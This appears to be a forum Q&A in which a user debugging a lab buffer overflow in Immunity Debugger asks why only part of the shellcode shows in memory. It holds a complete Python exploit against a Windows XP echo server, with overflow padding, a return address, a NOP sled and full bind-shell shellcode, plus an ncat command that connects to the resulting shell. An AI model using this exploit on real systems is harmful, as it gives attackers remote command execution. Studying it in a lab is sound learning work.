assembly : where to find the shellcode of a bufer overflow exploit

Question

On a windows xp machine, I open an "echo server" exe with Immunity Debugger, then run the program. The echo server is running on port 10000.

On my other machine, I run a python script (see below) that do a buffer overflow exploit, with a "windows/shell_bind_tcp" payload. The exploit works fine, that's not the question.

After I run the script, with python strcpy.py 192.168.1.123 . I don't see anything moving in Immunity Debugger. But I found this in the dump :

0022FB84  D9 CA D9 74 24 F4 58 31  ÙÊÙt$ôX1
0022FB8C  C9 B1 53 BA 9B B3 0A 02  ɱSº›³.
0022FB94  31 50 17 03 50 17 83 C0  1PPƒÀ
0022FB9C  04 E2 F5 FC E8 82 00 00  âõüè‚..
0022FBA4  00 60 89 E5 31 C0 64 8B  .`‰å1Àd‹

Only from "D9" to "50 17 83", it's the same as the shellcode below. Is it because what I see is the EXECUTED shellcode ? (instead of the original)

Then, on a separate terminal, I leverage the exploit by connecting to the remote machine : ncat 192.168.1.123 4444

Now, even though I'm connecting to port 4444 (not 10000), I suddenly see things move inside Immunity Debugger. Is this because the executed shellcode's memory reside inside the echo server program ?

Is it possible to find the complete original shellcode inside Immunity Debugger (starting with '\\xd9\\xca\\xd9\\x74', see script below) ? Of course, if the shellcode contains bad characters (like '\\x00'), I can easily find the full shellcode till the bad character.

strcpy.py :

#!/usr/bin/env python
import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #address family, tcp socket
sock.connect((sys.argv[1], 10000))

buffer = "A"*268
buffer += "\x7E\x6E\xEF\x77"
buffer += "\x90"*20
buffer +=("\xd9\xca\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x53\xba\x9b\xb3\x0a"
"\x02\x31\x50\x17\x03\x50\x17\x83\x5b\xb7\xe8\xf7\xa7\x50\x6e"
"\xf7\x57\xa1\x0f\x71\xb2\x90\x0f\xe5\xb7\x83\xbf\x6d\x95\x2f"
"\x4b\x23\x0d\xbb\x39\xec\x22\x0c\xf7\xca\x0d\x8d\xa4\x2f\x0c"
"\x0d\xb7\x63\xee\x2c\x78\x76\xef\x69\x65\x7b\xbd\x22\xe1\x2e"
"\x51\x46\xbf\xf2\xda\x14\x51\x73\x3f\xec\x50\x52\xee\x66\x0b"
"\x74\x11\xaa\x27\x3d\x09\xaf\x02\xf7\xa2\x1b\xf8\x06\x62\x52"
"\x01\xa4\x4b\x5a\xf0\xb4\x8c\x5d\xeb\xc2\xe4\x9d\x96\xd4\x33"
"\xdf\x4c\x50\xa7\x47\x06\xc2\x03\x79\xcb\x95\xc0\x75\xa0\xd2"
"\x8e\x99\x37\x36\xa5\xa6\xbc\xb9\x69\x2f\x86\x9d\xad\x6b\x5c"
"\xbf\xf4\xd1\x33\xc0\xe6\xb9\xec\x64\x6d\x57\xf8\x14\x2c\x30"
"\xcd\x14\xce\xc0\x59\x2e\xbd\xf2\xc6\x84\x29\xbf\x8f\x02\xae"
"\xc0\xa5\xf3\x20\x3f\x46\x04\x69\x84\x12\x54\x01\x2d\x1b\x3f"
"\xd1\xd2\xce\xaa\xd9\x75\xa1\xc8\x24\xc5\x11\x4d\x86\xae\x7b"
"\x42\xf9\xcf\x83\x88\x92\x78\x7e\x33\x8d\x24\xf7\xd5\xc7\xc4"
"\x51\x4d\x7f\x27\x86\x46\x18\x58\xec\xfe\x8e\x11\xe6\x39\xb1"
"\xa1\x2c\x6e\x25\x2a\x23\xaa\x54\x2d\x6e\x9a\x01\xba\xe4\x4b"
"\x60\x5a\xf8\x41\x12\xff\x6b\x0e\xe2\x76\x90\x99\xb5\xdf\x66"
"\xd0\x53\xf2\xd1\x4a\x41\x0f\x87\xb5\xc1\xd4\x74\x3b\xc8\x99"
"\xc1\x1f\xda\x67\xc9\x1b\x8e\x37\x9c\xf5\x78\xfe\x76\xb4\xd2"
"\xa8\x25\x1e\xb2\x2d\x06\xa1\xc4\x31\x43\x57\x28\x83\x3a\x2e"
"\x57\x2c\xab\xa6\x20\x50\x4b\x48\xfb\xd0\x7b\x03\xa1\x71\x14"
"\xca\x30\xc0\x79\xed\xef\x07\x84\x6e\x05\xf8\x73\x6e\x6c\xfd"
"\x38\x28\x9d\x8f\x51\xdd\xa1\x3c\x51\xf4")

sock.send(buffer)
print sock.recv(1024)
sock.close()

Answer 1

Set breakpoint on strcpy call and inspect destination buffer after strcpy return. If there are more strcpy follow the flow after recv.